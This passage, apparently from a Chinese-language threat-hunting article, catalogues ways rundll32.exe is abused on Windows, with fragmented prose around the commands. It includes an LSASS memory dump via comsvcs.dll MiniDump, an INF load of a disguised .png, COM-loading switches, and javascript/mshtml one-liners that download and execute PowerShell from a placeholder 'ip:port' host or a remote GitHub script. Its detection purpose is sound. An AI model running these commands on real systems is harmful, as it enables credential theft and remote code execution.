rundll32.exe <dllname>
rundll32.exe <dllname>,<entrypoint> <optional arguments>
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,OpenAs_RunDLL <file_path>
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,OpenAs_RunDLL C:\Windows\System32\drivers\etc\hosts
Control_RunDLL
和 Control_RunDLLAsUser
,它们可以用于运行 .CPL 文件,一般主要是控制面板中的小程序C:\WINDOWS\System32\rundll32.exe C:\WINDOWS\System32\shell32.dll,Control_RunDLL C:\WINDOWS\System32\firewall.cpl
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump <PID> C:\temp\lsass.dmp full
c:\windows\system32\rundll32.exe advpack.dll,LaunchINFSection c:\microsoft\360666.png,DefaultInstall
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/XXX/XXX")
-sta
和 -localserver
,它们俩都能用来加载恶意注册的 COM 组件rundll32.exe –localserver <CLSID_GUID>
rundll32.exe –sta <CLSID_GUID>
\HKEY_CLASSES_ROOT\CLSID\<GUID>
,可结合下图食用rundll32.exe <dllname>,<entrypoint> <optional arguments>
rundll32.exe uwcidcx.vb,capgj
-sta
关键字的用法,我们可能不方便根据 GUID 完成自动化研判,但是可以通过一些技巧提高狩猎效率